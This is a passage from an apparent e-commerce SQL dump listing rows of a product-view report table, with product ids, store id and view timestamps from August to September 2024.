(13215, NULL, NULL, 2062, 1, '2024-08-22 22:53:08'),
(13216, NULL, NULL, 2054, 1, '2024-08-23 01:35:34'),
(13217, NULL, NULL, 2059, 1, '2024-08-23 02:09:49'),
(13218, NULL, NULL, 2064, 1, '2024-08-23 02:39:18'),
(13219, NULL, NULL, 2061, 1, '2024-08-23 05:28:27'),
(13220, NULL, NULL, 2064, 1, '2024-08-23 05:56:42'),
(13221, NULL, NULL, 2054, 1, '2024-08-23 08:02:49'),
(13222, NULL, NULL, 2061, 1, '2024-08-23 10:11:16'),
(13223, NULL, NULL, 2059, 1, '2024-08-23 13:02:37'),
(13224, NULL, NULL, 2059, 1, '2024-08-23 17:22:53'),
(13225, NULL, NULL, 2064, 1, '2024-08-23 21:05:55'),
(13226, NULL, NULL, 2054, 1, '2024-08-23 21:33:29'),
(13227, NULL, NULL, 2058, 1, '2024-08-24 06:19:33'),
(13228, NULL, NULL, 2058, 1, '2024-08-24 07:40:06'),
(13229, NULL, NULL, 2062, 1, '2024-08-24 08:07:57'),
(13230, NULL, NULL, 2058, 1, '2024-08-24 09:10:25'),
(13231, NULL, NULL, 2054, 1, '2024-08-24 10:01:52'),
(13232, NULL, NULL, 2059, 1, '2024-08-24 13:15:52'),
(13233, NULL, NULL, 2055, 1, '2024-08-24 13:41:07'),
(13234, NULL, NULL, 2064, 1, '2024-08-24 14:18:03'),
(13235, NULL, NULL, 2063, 1, '2024-08-24 17:12:51'),
(13236, NULL, NULL, 2053, 1, '2024-08-24 17:45:07'),
(13237, NULL, NULL, 2062, 1, '2024-08-24 19:03:27'),
(13238, NULL, NULL, 2054, 1, '2024-08-25 00:32:09'),
(13239, NULL, NULL, 2058, 1, '2024-08-25 03:00:58'),
(13240, NULL, NULL, 2058, 1, '2024-08-25 03:01:02'),
(13241, NULL, NULL, 2063, 1, '2024-08-25 08:46:44'),
(13242, NULL, NULL, 2064, 1, '2024-08-25 11:05:52'),
(13243, NULL, NULL, 2064, 1, '2024-08-25 11:05:55'),
(13244, NULL, NULL, 2061, 1, '2024-08-25 13:44:35'),
(13245, NULL, NULL, 2054, 1, '2024-08-25 14:21:39'),
(13246, NULL, NULL, 2061, 1, '2024-08-25 14:50:47'),
(13247, NULL, NULL, 2059, 1, '2024-08-25 17:10:46'),
(13248, NULL, NULL, 2059, 1, '2024-08-25 17:10:48'),
(13249, NULL, NULL, 2058, 1, '2024-08-25 17:13:42'),
(13250, NULL, NULL, 2064, 1, '2024-08-25 18:04:57'),
(13251, NULL, NULL, 2059, 1, '2024-08-25 23:11:57'),
(13252, NULL, NULL, 2054, 1, '2024-08-26 03:57:57'),
(13253, NULL, NULL, 2064, 1, '2024-08-26 07:47:00'),
(13254, NULL, NULL, 2060, 1, '2024-08-26 09:14:54'),
(13255, NULL, NULL, 2058, 1, '2024-08-26 09:47:00'),
(13256, NULL, NULL, 2061, 1, '2024-08-26 11:58:27'),
(13257, NULL, NULL, 2054, 1, '2024-08-26 15:18:16'),
(13258, NULL, NULL, 2062, 1, '2024-08-26 19:01:58'),
(13259, NULL, NULL, 2064, 1, '2024-08-26 21:33:53'),
(13260, NULL, NULL, 2054, 1, '2024-08-27 02:25:14'),
(13261, NULL, NULL, 2063, 1, '2024-08-27 03:42:12'),
(13262, NULL, NULL, 2058, 1, '2024-08-27 04:56:48'),
(13263, NULL, NULL, 2054, 1, '2024-08-27 12:01:48'),
(13264, NULL, NULL, 2055, 1, '2024-08-27 12:01:53'),
(13265, NULL, NULL, 2064, 1, '2024-08-27 12:02:08'),
(13266, NULL, NULL, 2063, 1, '2024-08-27 12:02:12'),
(13267, NULL, NULL, 2062, 1, '2024-08-27 12:02:16'),
(13268, NULL, NULL, 2060, 1, '2024-08-27 12:02:19'),
(13269, NULL, NULL, 2059, 1, '2024-08-27 12:02:23'),
(13270, NULL, NULL, 2061, 1, '2024-08-27 12:02:27'),
(13271, NULL, NULL, 2058, 1, '2024-08-27 12:02:32'),
(13272, NULL, NULL, 2062, 1, '2024-08-27 12:08:18'),
(13273, NULL, NULL, 2061, 1, '2024-08-27 12:59:31'),
(13274, NULL, NULL, 2054, 1, '2024-08-27 14:50:52'),
(13275, NULL, NULL, 2059, 1, '2024-08-27 15:23:09'),
(13276, NULL, NULL, 2053, 1, '2024-08-27 18:24:09'),
(13277, NULL, NULL, 2060, 1, '2024-08-27 22:17:04'),
(13278, NULL, NULL, 2060, 1, '2024-08-27 22:17:07'),
(13279, NULL, NULL, 2054, 1, '2024-08-28 05:57:06'),
(13280, NULL, NULL, 2059, 1, '2024-08-28 06:03:20'),
(13281, NULL, NULL, 2055, 1, '2024-08-28 07:06:22'),
(13282, NULL, NULL, 2055, 1, '2024-08-28 08:28:21'),
(13283, NULL, NULL, 2058, 1, '2024-08-28 16:26:11'),
(13284, NULL, NULL, 2054, 1, '2024-08-28 16:26:20'),
(13285, NULL, NULL, 2064, 1, '2024-08-28 16:26:25'),
(13286, NULL, NULL, 2062, 1, '2024-08-28 16:26:41'),
(13287, NULL, NULL, 2055, 1, '2024-08-28 16:26:43'),
(13288, NULL, NULL, 2059, 1, '2024-08-28 16:26:50'),
(13289, NULL, NULL, 2063, 1, '2024-08-28 16:26:52'),
(13290, NULL, NULL, 2060, 1, '2024-08-28 16:26:55'),
(13291, NULL, NULL, 2061, 1, '2024-08-28 16:26:59'),
(13292, NULL, NULL, 2058, 1, '2024-08-28 16:27:23'),
(13293, NULL, NULL, 2064, 1, '2024-08-28 16:27:33'),
(13294, NULL, NULL, 2062, 1, '2024-08-28 16:27:41'),
(13295, NULL, NULL, 2055, 1, '2024-08-28 16:27:42'),
(13296, NULL, NULL, 2059, 1, '2024-08-28 16:27:51'),
(13297, NULL, NULL, 2063, 1, '2024-08-28 16:27:52'),
(13298, NULL, NULL, 2061, 1, '2024-08-28 16:27:53'),
(13299, NULL, NULL, 2054, 1, '2024-08-28 16:27:57'),
(13300, NULL, NULL, 2060, 1, '2024-08-28 16:28:03'),
(13301, NULL, NULL, 2053, 1, '2024-08-28 16:28:15'),
(13302, NULL, NULL, 2055, 1, '2024-08-28 18:42:04'),
(13303, NULL, NULL, 2054, 1, '2024-08-28 19:02:01'),
(13304, NULL, NULL, 2063, 1, '2024-08-28 21:23:51'),
(13305, NULL, NULL, 2063, 1, '2024-08-29 01:36:35'),
(13306, NULL, NULL, 2064, 1, '2024-08-29 03:49:14'),
(13307, NULL, NULL, 2054, 1, '2024-08-29 06:30:31'),
(13308, NULL, NULL, 2054, 1, '2024-08-29 09:12:28'),
(13309, NULL, NULL, 2059, 1, '2024-08-29 10:54:39'),
(13310, NULL, NULL, 2059, 1, '2024-08-29 10:54:42'),
(13311, NULL, NULL, 2062, 1, '2024-08-29 11:45:18'),
(13312, NULL, NULL, 2054, 1, '2024-08-29 22:08:39'),
(13313, NULL, NULL, 2063, 1, '2024-08-29 23:24:20'),
(13314, NULL, NULL, 2064, 1, '2024-08-29 23:36:06'),
(13315, NULL, NULL, 2064, 1, '2024-08-30 00:04:50'),
(13316, NULL, NULL, 2054, 1, '2024-08-30 00:29:07'),
(13317, NULL, NULL, 2058, 1, '2024-08-30 03:01:05'),
(13318, NULL, NULL, 2054, 1, '2024-08-30 03:04:21'),
(13319, NULL, NULL, 2061, 1, '2024-08-30 03:13:18'),
(13320, NULL, NULL, 2054, 1, '2024-08-30 05:39:42'),
(13321, NULL, NULL, 2064, 1, '2024-08-30 07:35:55'),
(13322, NULL, NULL, 2058, 1, '2024-08-30 09:29:47'),
(13323, NULL, NULL, 2054, 1, '2024-08-30 10:08:53'),
(13324, NULL, NULL, 2058, 1, '2024-08-30 13:54:58'),
(13325, NULL, NULL, 2058, 1, '2024-08-30 13:54:59'),
(13326, NULL, NULL, 2058, 1, '2024-08-30 13:55:43'),
(13327, NULL, NULL, 2061, 1, '2024-08-30 14:51:43'),
(13328, NULL, NULL, 2064, 1, '2024-08-30 16:07:56'),
(13329, NULL, NULL, 2061, 1, '2024-08-30 20:50:01'),
(13330, NULL, NULL, 2054, 1, '2024-08-31 00:16:49'),
(13331, NULL, NULL, 2058, 1, '2024-08-31 01:00:55'),
(13332, NULL, NULL, 2063, 1, '2024-08-31 01:26:53'),
(13333, NULL, NULL, 2054, 1, '2024-08-31 02:17:33'),
(13334, NULL, NULL, 2061, 1, '2024-08-31 05:36:03'),
(13335, NULL, NULL, 2054, 1, '2024-08-31 09:31:15'),
(13336, NULL, NULL, 2054, 1, '2024-08-31 14:06:44'),
(13337, NULL, NULL, 2064, 1, '2024-08-31 17:11:58'),
(13338, NULL, NULL, 2059, 1, '2024-08-31 23:23:53'),
(13339, NULL, NULL, 2059, 1, '2024-09-01 01:14:48'),
(13340, NULL, NULL, 2054, 1, '2024-09-01 02:58:31'),
(13341, NULL, NULL, 2058, 1, '2024-09-01 04:43:53'),
(13342, NULL, NULL, 2064, 1, '2024-09-01 09:12:43'),
(13343, NULL, NULL, 2053, 1, '2024-09-01 16:37:21'),
(13344, NULL, NULL, 2058, 1, '2024-09-01 17:24:48'),
(13345, NULL, NULL, 2054, 1, '2024-09-01 18:12:53'),
(13346, NULL, NULL, 2064, 1, '2024-09-01 18:27:56'),
(13347, NULL, NULL, 2054, 1, '2024-09-01 19:47:02'),
(13348, NULL, NULL, 2060, 1, '2024-09-01 20:37:32'),
(13349, NULL, NULL, 2060, 1, '2024-09-01 20:39:26'),
(13350, NULL, NULL, 2063, 1, '2024-09-01 20:47:22'),
(13351, NULL, NULL, 2058, 1, '2024-09-01 21:12:38'),
(13352, NULL, NULL, 2060, 1, '2024-09-01 22:01:02'),
(13353, NULL, NULL, 2063, 1, '2024-09-01 22:10:53'),
(13354, NULL, NULL, 2058, 1, '2024-09-01 22:35:49'),
(13355, NULL, NULL, 2060, 1, '2024-09-01 23:15:06'),
(13356, NULL, NULL, 2055, 1, '2024-09-01 23:25:16'),
(13357, NULL, NULL, 2061, 1, '2024-09-02 00:44:53'),
(13358, NULL, NULL, 2064, 1, '2024-09-02 00:48:05'),
(13359, NULL, NULL, 2054, 1, '2024-09-02 00:53:26'),
(13360, NULL, NULL, 2060, 1, '2024-09-02 01:03:05'),
(13361, NULL, NULL, 2062, 1, '2024-09-02 01:24:32'),
(13362, NULL, NULL, 2055, 1, '2024-09-02 01:46:53'),
(13363, NULL, NULL, 2060, 1, '2024-09-02 02:41:42'),
(13364, NULL, NULL, 2063, 1, '2024-09-02 02:51:57'),
(13365, NULL, NULL, 2058, 1, '2024-09-02 03:18:09'),
(13366, NULL, NULL, 2063, 1, '2024-09-02 03:24:03'),
(13367, NULL, NULL, 2055, 1, '2024-09-02 04:09:34'),
(13368, NULL, NULL, 2064, 1, '2024-09-02 04:28:05'),
(13369, NULL, NULL, 2054, 1, '2024-09-02 04:41:10'),
(13370, NULL, NULL, 2061, 1, '2024-09-02 05:31:59'),
(13371, NULL, NULL, 2062, 1, '2024-09-02 06:03:32'),
(13372, NULL, NULL, 2062, 1, '2024-09-02 06:13:46'),
(13373, NULL, NULL, 2060, 1, '2024-09-02 07:13:58'),
(13374, NULL, NULL, 2054, 1, '2024-09-02 07:43:42'),
(13375, NULL, NULL, 2059, 1, '2024-09-02 08:01:14'),
(13376, NULL, NULL, 2064, 1, '2024-09-02 08:14:43'),
(13377, NULL, NULL, 2055, 1, '2024-09-02 16:31:47'),
(13378, NULL, NULL, 2063, 1, '2024-09-02 17:08:33'),
(13379, NULL, NULL, 2054, 1, '2024-09-02 17:30:08'),
(13380, NULL, NULL, 2055, 1, '2024-09-02 18:18:24'),
(13381, NULL, NULL, 2058, 1, '2024-09-02 23:43:01'),
(13382, NULL, NULL, 2062, 1, '2024-09-03 02:59:13'),
(13383, NULL, NULL, 2061, 1, '2024-09-03 04:31:19'),
(13384, NULL, NULL, 2064, 1, '2024-09-03 05:26:37'),
(13385, NULL, NULL, 2064, 1, '2024-09-03 05:26:40'),
(13386, NULL, NULL, 2064, 1, '2024-09-03 05:26:40'),
(13387, NULL, NULL, 2054, 1, '2024-09-03 06:30:09'),
(13388, NULL, NULL, 2063, 1, '2024-09-03 12:29:01'),
(13389, NULL, NULL, 2064, 1, '2024-09-03 16:49:30'),
(13390, NULL, NULL, 2064, 1, '2024-09-03 17:44:44'),
(13391, NULL, NULL, 2060, 1, '2024-09-03 18:44:24'),
(13392, NULL, NULL, 2062, 1, '2024-09-03 19:14:46'),
(13393, NULL, NULL, 2054, 1, '2024-09-03 20:18:40'),
(13394, NULL, NULL, 2064, 1, '2024-09-04 00:46:24'),
(13395, NULL, NULL, 2054, 1, '2024-09-04 04:27:25'),
(13396, NULL, NULL, 2064, 1, '2024-09-04 10:49:11'),
(13397, NULL, NULL, 2063, 1, '2024-09-04 11:18:28'),
(13398, NULL, NULL, 2055, 1, '2024-09-04 11:26:17'),
(13399, NULL, NULL, 2055, 1, '2024-09-04 11:26:19'),
(13400, NULL, NULL, 2064, 1, '2024-09-04 11:26:52'),
(13401, NULL, NULL, 2058, 1, '2024-09-04 11:27:28'),
(13402, NULL, NULL, 2060, 1, '2024-09-04 11:27:44'),
(13403, NULL, NULL, 2064, 1, '2024-09-04 12:18:53'),
(13404, NULL, NULL, 2064, 1, '2024-09-04 16:01:00'),
(13405, NULL, NULL, 2062, 1, '2024-09-05 00:39:41'),
(13406, NULL, NULL, 2064, 1, '2024-09-05 00:45:18'),
(13407, NULL, NULL, 2063, 1, '2024-09-05 05:18:38'),
(13408, NULL, NULL, 2058, 1, '2024-09-05 05:27:57'),
(13409, NULL, NULL, 2061, 1, '2024-09-05 05:35:46'),
(13410, NULL, NULL, 2061, 1, '2024-09-05 13:45:49'),
(13411, NULL, NULL, 2054, 1, '2024-09-05 14:50:57'),
(13412, NULL, NULL, 2063, 1, '2024-09-05 16:50:25'),
(13413, NULL, NULL, 2062, 1, '2024-09-05 17:26:07'),
(13414, NULL, NULL, 2054, 1, '2024-09-05 19:39:08'),
(13415, NULL, NULL, 2055, 1, '2024-09-05 23:30:02'),
(13416, NULL, NULL, 2064, 1, '2024-09-06 02:13:56'),
(13417, NULL, NULL, 2061, 1, '2024-09-06 07:07:34'),
(13418, NULL, NULL, 2061, 1, '2024-09-06 07:07:35'),
(13419, NULL, NULL, 2054, 1, '2024-09-06 08:18:17'),
(13420, NULL, NULL, 2055, 1, '2024-09-06 08:18:30'),
(13421, NULL, NULL, 2058, 1, '2024-09-06 08:18:50'),
(13422, NULL, NULL, 2061, 1, '2024-09-06 08:19:00'),
(13423, NULL, NULL, 2060, 1, '2024-09-06 08:19:09'),
(13424, NULL, NULL, 2059, 1, '2024-09-06 08:19:20'),
(13425, NULL, NULL, 2063, 1, '2024-09-06 08:19:32'),
(13426, NULL, NULL, 2062, 1, '2024-09-06 08:19:40'),
(13427, NULL, NULL, 2064, 1, '2024-09-06 08:19:59'),
(13428, NULL, NULL, 2064, 1, '2024-09-06 09:18:31'),
(13429, NULL, NULL, 2059, 1, '2024-09-06 09:43:35'),
(13430, NULL, NULL, 2062, 1, '2024-09-06 11:01:23'),
(13431, NULL, NULL, 2060, 1, '2024-09-06 11:39:33'),
(13432, NULL, NULL, 2054, 1, '2024-09-06 11:56:04'),
(13433, NULL, NULL, 2055, 1, '2024-09-06 11:56:08'),
(13434, NULL, NULL, 2058, 1, '2024-09-06 11:56:21'),
(13435, NULL, NULL, 2061, 1, '2024-09-06 11:56:28'),
(13436, NULL, NULL, 2060, 1, '2024-09-06 11:56:36'),
(13437, NULL, NULL, 2059, 1, '2024-09-06 11:56:42'),
(13438, NULL, NULL, 2063, 1, '2024-09-06 11:56:50'),
(13439, NULL, NULL, 2062, 1, '2024-09-06 11:56:56'),
(13440, NULL, NULL, 2064, 1, '2024-09-06 11:57:03'),
(13441, NULL, NULL, 2053, 1, '2024-09-06 11:59:33'),
(13442, NULL, NULL, 2054, 1, '2024-09-06 12:15:58'),
(13443, NULL, NULL, 2058, 1, '2024-09-06 14:36:01'),
(13444, NULL, NULL, 2064, 1, '2024-09-06 16:27:53'),
(13445, NULL, NULL, 2061, 1, '2024-09-06 16:42:59'),
(13446, NULL, NULL, 2059, 1, '2024-09-06 17:55:12'),
(13447, NULL, NULL, 2054, 1, '2024-09-06 18:08:33'),
(13448, NULL, NULL, 2061, 1, '2024-09-06 20:36:14'),
(13449, NULL, NULL, 2054, 1, '2024-09-06 23:22:14'),
(13450, NULL, NULL, 2064, 1, '2024-09-07 01:15:52'),
(13451, NULL, NULL, 2054, 1, '2024-09-07 04:22:35'),
(13452, NULL, NULL, 2059, 1, '2024-09-07 04:35:56'),
(13453, NULL, NULL, 2061, 1, '2024-09-07 05:32:37'),
(13454, NULL, NULL, 2059, 1, '2024-09-07 10:52:46'),
(13455, NULL, NULL, 2059, 1, '2024-09-07 10:52:48'),
(13456, NULL, NULL, 2059, 1, '2024-09-07 10:52:48'),
(13457, NULL, NULL, 2064, 1, '2024-09-07 10:54:49'),
(13458, NULL, NULL, 2061, 1, '2024-09-07 11:01:49'),
(13459, NULL, NULL, 2064, 1, '2024-09-07 11:02:34'),
(13460, NULL, NULL, 2054, 1, '2024-09-07 11:03:49'),
(13461, NULL, NULL, 2053, 1, '2024-09-07 13:41:04'),
(13462, NULL, NULL, 2061, 1, '2024-09-07 13:49:41'),
(13463, NULL, NULL, 2053, 1, '2024-09-07 16:27:31'),
(13464, NULL, NULL, 2054, 1, '2024-09-07 16:59:05'),
(13465, NULL, NULL, 2060, 1, '2024-09-07 19:16:45'),
(13466, NULL, NULL, 2055, 1, '2024-09-07 23:36:54'),
(13467, NULL, NULL, 2059, 1, '2024-09-08 00:18:32'),
(13468, NULL, NULL, 2063, 1, '2024-09-08 00:36:48'),
(13469, NULL, NULL, 2060, 1, '2024-09-08 02:50:06'),
(13470, NULL, NULL, 2054, 1, '2024-09-08 04:55:47'),
(13471, NULL, NULL, 2064, 1, '2024-09-08 05:08:06'),
(13472, NULL, NULL, 2058, 1, '2024-09-08 10:16:16'),
(13473, NULL, NULL, 2062, 1, '2024-09-08 10:42:25'),
(13474, NULL, NULL, 2061, 1, '2024-09-08 13:21:06'),
(13475, NULL, NULL, 2064, 1, '2024-09-08 14:07:48'),
(13476, NULL, NULL, 2054, 1, '2024-09-08 20:44:54'),
(13477, NULL, NULL, 2064, 1, '2024-09-09 03:54:09'),
(13478, NULL, NULL, 2054, 1, '2024-09-09 08:25:57'),
(13479, NULL, NULL, 2061, 1, '2024-09-09 09:10:09'),
(13480, NULL, NULL, 2061, 1, '2024-09-09 10:00:43'),
(13481, NULL, NULL, 2058, 1, '2024-09-09 10:50:45'),
(13482, NULL, NULL, 2064, 1, '2024-09-09 11:12:52'),
(13483, NULL, NULL, 2059, 1, '2024-09-09 21:50:21'),
(13484, NULL, NULL, 2058, 1, '2024-09-09 22:43:13'),
(13485, NULL, NULL, 2063, 1, '2024-09-10 00:54:15'),
(13486, NULL, NULL, 2054, 1, '2024-09-10 01:11:48'),
(13487, NULL, NULL, 2062, 1, '2024-09-10 01:14:14'),
(13488, NULL, NULL, 2060, 1, '2024-09-10 01:34:12'),
(13489, NULL, NULL, 2060, 1, '2024-09-10 03:26:51'),
(13490, NULL, NULL, 2054, 1, '2024-09-10 07:43:22'),
(13491, NULL, NULL, 2054, 1, '2024-09-10 10:57:48'),
(13492, NULL, NULL, 2062, 1, '2024-09-10 11:19:08'),
(13493, NULL, NULL, 2064, 1, '2024-09-10 11:33:16'),
(13494, NULL, NULL, 2054, 1, '2024-09-10 13:19:12'),
(13495, NULL, NULL, 2063, 1, '2024-09-10 19:04:19'),
(13496, NULL, NULL, 2061, 1, '2024-09-10 22:07:19'),
(13497, NULL, NULL, 2062, 1, '2024-09-11 01:45:07'),
(13498, NULL, NULL, 2054, 1, '2024-09-11 05:00:52'),
(13499, NULL, NULL, 2060, 1, '2024-09-11 08:13:07'),
(13500, NULL, NULL, 2063, 1, '2024-09-11 11:42:17'),
(13501, NULL, NULL, 2064, 1, '2024-09-11 11:42:41'),
(13502, NULL, NULL, 2053, 1, '2024-09-11 11:55:29'),
(13503, NULL, NULL, 2054, 1, '2024-09-11 15:08:44'),
(13504, NULL, NULL, 2061, 1, '2024-09-11 15:31:44'),
(13505, NULL, NULL, 2055, 1, '2024-09-11 15:31:44'),
(13506, NULL, NULL, 2064, 1, '2024-09-11 15:31:44'),
(13507, NULL, NULL, 2064, 1, '2024-09-11 15:31:44'),
(13508, NULL, NULL, 2058, 1, '2024-09-11 15:31:44'),
(13509, NULL, NULL, 2064, 1, '2024-09-11 15:31:45'),
(13510, NULL, NULL, 2059, 1, '2024-09-11 15:32:47'),
(13511, NULL, NULL, 2062, 1, '2024-09-11 15:32:48'),
(13512, NULL, NULL, 2060, 1, '2024-09-11 15:32:49'),
(13513, NULL, NULL, 2053, 1, '2024-09-11 15:32:50'),
(13514, NULL, NULL, 2063, 1, '2024-09-11 15:32:51'),
(13515, NULL, NULL, 2054, 1, '2024-09-11 15:32:53'),
(13516, NULL, NULL, 2053, 1, '2024-09-11 15:32:59'),
(13517, NULL, NULL, 2053, 1, '2024-09-11 15:33:00'),
(13518, NULL, NULL, 2054, 1, '2024-09-11 15:40:37'),
(13519, NULL, NULL, 2063, 1, '2024-09-11 19:11:51'),
(13520, NULL, NULL, 2061, 1, '2024-09-11 19:53:06'),
(13521, NULL, NULL, 2054, 1, '2024-09-11 23:33:14'),
(13522, NULL, NULL, 2054, 1, '2024-09-12 03:36:27'),
(13523, NULL, NULL, 2063, 1, '2024-09-12 05:25:37'),
(13524, NULL, NULL, 2058, 1, '2024-09-12 05:29:38'),
(13525, NULL, NULL, 2061, 1, '2024-09-12 06:36:01'),
(13526, NULL, NULL, 2062, 1, '2024-09-12 06:43:09'),
(13527, NULL, NULL, 2059, 1, '2024-09-12 06:45:12'),
(13528, NULL, NULL, 2060, 1, '2024-09-12 06:45:13'),
(13529, NULL, NULL, 2064, 1, '2024-09-12 06:47:15'),
(13530, NULL, NULL, 2061, 1, '2024-09-12 07:01:18'),
(13531, NULL, NULL, 2060, 1, '2024-09-12 11:19:05'),
(13532, NULL, NULL, 2063, 1, '2024-09-12 11:19:32'),
(13533, NULL, NULL, 2063, 1, '2024-09-12 11:32:08'),
(13534, NULL, NULL, 2059, 1, '2024-09-12 11:35:17'),
(13535, NULL, NULL, 2058, 1, '2024-09-12 12:06:38'),
(13536, NULL, NULL, 2058, 1, '2024-09-12 12:16:31'),
(13537, NULL, NULL, 2060, 1, '2024-09-12 12:36:36'),
(13538, NULL, NULL, 2064, 1, '2024-09-12 12:40:36'),
(13539, NULL, NULL, 2055, 1, '2024-09-12 13:16:34'),
(13540, NULL, NULL, 2055, 1, '2024-09-12 15:43:16'),
(13541, NULL, NULL, 2060, 1, '2024-09-12 15:43:21'),
(13542, NULL, NULL, 2063, 1, '2024-09-12 15:59:39'),
(13543, NULL, NULL, 2058, 1, '2024-09-12 16:43:38'),
(13544, NULL, NULL, 2054, 1, '2024-09-12 16:58:45'),
(13545, NULL, NULL, 2055, 1, '2024-09-12 18:12:25'),
(13546, NULL, NULL, 2064, 1, '2024-09-12 18:56:45'),
(13547, NULL, NULL, 2058, 1, '2024-09-12 18:58:38'),
(13548, NULL, NULL, 2064, 1, '2024-09-12 19:38:28'),
(13549, NULL, NULL, 2061, 1, '2024-09-12 20:11:32'),
(13550, NULL, NULL, 2063, 1, '2024-09-12 20:23:34'),
(13551, NULL, NULL, 2060, 1, '2024-09-12 21:41:28'),
(13552, NULL, NULL, 2064, 1, '2024-09-12 21:48:11'),
(13553, NULL, NULL, 2063, 1, '2024-09-12 21:54:01'),
(13554, NULL, NULL, 2062, 1, '2024-09-12 22:08:24'),
(13555, NULL, NULL, 2058, 1, '2024-09-12 22:28:23');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(13556, NULL, NULL, 2064, 1, '2024-09-12 22:43:02'),
(13557, NULL, NULL, 2055, 1, '2024-09-12 23:44:50'),
(13558, NULL, NULL, 2055, 1, '2024-09-13 00:52:04'),
(13559, NULL, NULL, 2061, 1, '2024-09-13 01:27:43'),
(13560, NULL, NULL, 2062, 1, '2024-09-13 02:09:17'),
(13561, NULL, NULL, 2059, 1, '2024-09-13 02:21:44'),
(13562, NULL, NULL, 2063, 1, '2024-09-13 03:20:42'),
(13563, NULL, NULL, 2061, 1, '2024-09-13 03:20:47'),
(13564, NULL, NULL, 2055, 1, '2024-09-13 03:20:51'),
(13565, NULL, NULL, 2064, 1, '2024-09-13 03:20:54'),
(13566, NULL, NULL, 2060, 1, '2024-09-13 03:20:59'),
(13567, NULL, NULL, 2059, 1, '2024-09-13 03:21:02'),
(13568, NULL, NULL, 2058, 1, '2024-09-13 03:21:10'),
(13569, NULL, NULL, 2064, 1, '2024-09-13 03:21:35'),
(13570, NULL, NULL, 2062, 1, '2024-09-13 03:22:19'),
(13571, NULL, NULL, 2054, 1, '2024-09-13 03:22:22'),
(13572, NULL, NULL, 2061, 1, '2024-09-13 03:25:23'),
(13573, NULL, NULL, 2054, 1, '2024-09-13 03:25:35'),
(13574, NULL, NULL, 2059, 1, '2024-09-13 03:25:47'),
(13575, NULL, NULL, 2058, 1, '2024-09-13 03:25:50'),
(13576, NULL, NULL, 2055, 1, '2024-09-13 03:26:55'),
(13577, NULL, NULL, 2064, 1, '2024-09-13 03:27:31'),
(13578, NULL, NULL, 2053, 1, '2024-09-13 03:27:35'),
(13579, NULL, NULL, 2063, 1, '2024-09-13 03:28:03'),
(13580, NULL, NULL, 2062, 1, '2024-09-13 03:28:11'),
(13581, NULL, NULL, 2060, 1, '2024-09-13 03:28:34'),
(13582, NULL, NULL, 2054, 1, '2024-09-13 03:32:52'),
(13583, NULL, NULL, 2059, 1, '2024-09-13 03:51:52'),
(13584, NULL, NULL, 2064, 1, '2024-09-13 04:07:14'),
(13585, NULL, NULL, 2053, 1, '2024-09-13 04:23:57'),
(13586, NULL, NULL, 2063, 1, '2024-09-13 04:24:12'),
(13587, NULL, NULL, 2062, 1, '2024-09-13 04:24:15'),
(13588, NULL, NULL, 2060, 1, '2024-09-13 04:24:18'),
(13589, NULL, NULL, 2059, 1, '2024-09-13 04:24:21'),
(13590, NULL, NULL, 2054, 1, '2024-09-13 05:37:26'),
(13591, NULL, NULL, 2053, 1, '2024-09-13 07:40:31'),
(13592, NULL, NULL, 2054, 1, '2024-09-13 09:18:17'),
(13593, NULL, NULL, 2059, 1, '2024-09-13 09:25:22'),
(13594, NULL, NULL, 2062, 1, '2024-09-13 11:14:22'),
(13595, NULL, NULL, 2062, 1, '2024-09-13 13:20:51'),
(13596, NULL, NULL, 2060, 1, '2024-09-13 14:09:32'),
(13597, NULL, NULL, 2059, 1, '2024-09-13 14:25:32'),
(13598, NULL, NULL, 2060, 1, '2024-09-13 16:57:33'),
(13599, NULL, NULL, 2063, 1, '2024-09-13 17:10:00'),
(13600, NULL, NULL, 2058, 1, '2024-09-13 17:44:46'),
(13601, NULL, NULL, 2059, 1, '2024-09-13 17:57:48'),
(13602, NULL, NULL, 2060, 1, '2024-09-13 19:05:39'),
(13603, NULL, NULL, 2063, 1, '2024-09-13 19:26:54'),
(13604, NULL, NULL, 2054, 1, '2024-09-13 19:58:43'),
(13605, NULL, NULL, 2058, 1, '2024-09-13 20:23:49'),
(13606, NULL, NULL, 2055, 1, '2024-09-13 22:17:26'),
(13607, NULL, NULL, 2054, 1, '2024-09-13 23:19:42'),
(13608, NULL, NULL, 2060, 1, '2024-09-13 23:21:45'),
(13609, NULL, NULL, 2061, 1, '2024-09-14 01:05:17'),
(13610, NULL, NULL, 2062, 1, '2024-09-14 02:18:16'),
(13611, NULL, NULL, 2054, 1, '2024-09-14 04:37:32'),
(13612, NULL, NULL, 2059, 1, '2024-09-14 05:06:54'),
(13613, NULL, NULL, 2064, 1, '2024-09-14 05:30:04'),
(13614, NULL, NULL, 2063, 1, '2024-09-14 06:28:09'),
(13615, NULL, NULL, 2054, 1, '2024-09-14 07:41:55'),
(13616, NULL, NULL, 2063, 1, '2024-09-14 13:23:50'),
(13617, NULL, NULL, 2054, 1, '2024-09-14 22:59:47'),
(13618, NULL, NULL, 2058, 1, '2024-09-14 23:16:45'),
(13619, NULL, NULL, 2058, 1, '2024-09-15 06:44:48'),
(13620, NULL, NULL, 2064, 1, '2024-09-15 09:49:50'),
(13621, NULL, NULL, 2058, 1, '2024-09-15 10:08:04'),
(13622, NULL, NULL, 2061, 1, '2024-09-15 12:01:40'),
(13623, NULL, NULL, 2060, 1, '2024-09-15 12:05:03'),
(13624, NULL, NULL, 2061, 1, '2024-09-15 12:21:33'),
(13625, NULL, NULL, 2054, 1, '2024-09-15 12:27:58'),
(13626, NULL, NULL, 2058, 1, '2024-09-15 15:39:33'),
(13627, NULL, NULL, 2054, 1, '2024-09-16 01:20:59'),
(13628, NULL, NULL, 2054, 1, '2024-09-16 02:39:32'),
(13629, NULL, NULL, 2062, 1, '2024-09-16 02:59:30'),
(13630, NULL, NULL, 2059, 1, '2024-09-16 07:58:30'),
(13631, NULL, NULL, 2060, 1, '2024-09-16 07:58:35'),
(13632, NULL, NULL, 2063, 1, '2024-09-16 08:00:37'),
(13633, NULL, NULL, 2058, 1, '2024-09-16 08:00:38'),
(13634, NULL, NULL, 2064, 1, '2024-09-16 08:00:39'),
(13635, NULL, NULL, 2062, 1, '2024-09-16 08:01:43'),
(13636, NULL, NULL, 2061, 1, '2024-09-16 08:01:45'),
(13637, NULL, NULL, 2058, 1, '2024-09-16 10:33:03'),
(13638, NULL, NULL, 2061, 1, '2024-09-16 11:36:09'),
(13639, NULL, NULL, 2054, 1, '2024-09-16 12:12:06'),
(13640, NULL, NULL, 2054, 1, '2024-09-16 13:30:45'),
